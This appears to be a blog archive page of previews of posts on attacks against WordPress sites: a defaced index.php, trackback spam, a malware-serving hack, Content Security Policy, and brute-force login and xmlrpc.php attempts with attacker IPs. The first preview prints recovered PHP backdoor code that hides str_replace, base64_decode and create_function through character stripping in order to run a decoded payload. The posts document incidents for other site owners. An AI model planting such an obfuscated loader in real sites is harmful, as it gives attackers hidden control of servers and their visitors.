Hacked By Muslim Hacker, Hacked By BLEİSY, screen cap, WordPress
A customer site got hacked today. Blue Host, shared service. WP core, plugins, themes all current.
They hacked the index.php on the public_html dir, and had malware code in the replaced index.php, along with 2 extra files. Front page was defaced, but site was left intact.
added files: 9e09ad (data file) and pfm.php (had php code) Here’s the pfm.php code:
$avj = str_replace(“j”,””,”sjtrj_jrjejpljajcje”);
$qu = $avj(“i”, “”, “ibiaisie6i4i_dieicoide”);
$fh = $avj(“k”,””,”crkekatkek_kfkukncktkikon”);
$hwy = $fh(”, $qu($avj(“c”, “”, $or.$zs.$lq.$bu))); $hwy();
Recently I have been observing a different WordPress spam technique that uses WP trackbacks. This technique has some interesting characteristics that are unlike other types of spam, so my usual clues as to origin and banning method did not work. Fortunately this technique also has some unique characteristics that can be used to ban them. Fortunately.
When one WP site links to another WP site, the WP sites communicate with each other using a method called trackbacks. The first site sends a trackback request to the second site. The second site posts the trackback as a special comment, which invites the user to click through to the first site. These trackbacks are automated, making it convenient for both sites.
This is a preview of
WordPress Trackback Spam Technique for Content Spamming
. Read the full post (1127 words, 1 image, estimated 4:30 mins reading time)
Hacked By An0n 3xPloiTeR And 8B0K3N H34R7 Team Pak Cyber Ghosts [P.C.G], main message screen with running footer 1
This hack suspended the hosting account and the web site as a malware infected account. The hack set up a malware attack for anyone who visited the site, specifically targeting Windows. I am still trying to figure out how they got in, This is a Pakistani-based attack, or so their message says. I’ll try to document as much as I can to help others in the same situation.
This is a preview of
Hacked By An0n 3xPloiTeR, 8B0K3N H34R7, Team Pak Cyber Ghosts: Cyber Hack Forensic Examination
. Read the full post (1149 words, 6 images, estimated 4:36 mins reading time)
The National Post put up a news article about user centered design in cars, which turned out to be an ad. I took screen caps of this offending article and wrote about it. The image file name I used included the snippet “-ad-“, which was enough for my ad-block plus browser plugin to remove it from my view. Only after renaming the file name and reuploading it could I actually see the ad. Lesson learned.
Reading, I was, about a web site security tool from Mozilla, so I had to try it. My site, the one you are on now, rated “D-“. It was no consolation that most sites rate “F”. Within the rating there was this criteria called “Content Security Policy” (CSP) that tweaked my interest.
Content Security Policy: Purpose
A CSP is a policy that you put into the head section of your page that whitelists all the sites that contribute to your page. If someone tries to add something to your page’s content but is not on you CSP, your browser will not load it. This stops a nasty infection of something called “cross site scripting” or XSS.
Again, they come, but this time with individual IPs. Huh? Not so funny anymore. 18 individual IP, all timed differently.
UA: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36
Permanent link to this post
(71 words, 0 images, estimated 17 secs reading time)
Strong, WordPress is, otherwise it would have been breached long ago. These three attackers did a brute force login attack on me today. This is not the first and will certainly not be the last. While I can track down the IP and ISP, and ban them, their origins I will never know. This is the murky world of the internet, and it is worldwide.
- 220.127.116.11: 18.104.22.168 – 22.214.171.124 WIFLY GA GABON has tried security hacks on my site before, 6 attempts
- 126.96.36.199 mes.megion.ru 188.8.131.52 – 184.108.40.206 Lider Telecom Ru, 52 attempts
- 220.127.116.11 18.104.22.168 – 22.214.171.124 Wimax New Delhi IN, 8 attempts
Three hackers, one from Africa, one from Russia, one from India. This is the global entity called the Internet.
Brute force attacked, I was, for the xmlrpc.php API in WordPress. Thankfully WordPress was strong enough to ward off this attack. I’ve had random attacks on xmlrpc.php before, but nothing this organized. I thought I’d document a case of 57 xmlrpc.php POST attempts here for all to see. Maybe someone can identify the culprit, as I could not.
I had 57 POSTs to xmlrpc.php on WordPress. They are randomly spaced apart throughout the day, use different IP addresses and hosts, but use the same POST (POST /wp/xmlrpc.php HTTP/1.0), referrer (http://dontai.com/wp/xmlrpc.php) and user agent (Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko)
This is a preview of
Brute Force xmlrpc.php Attack on WordPress: Case Study
. Read the full post (1619 words, 0 images, estimated 6:29 mins reading time)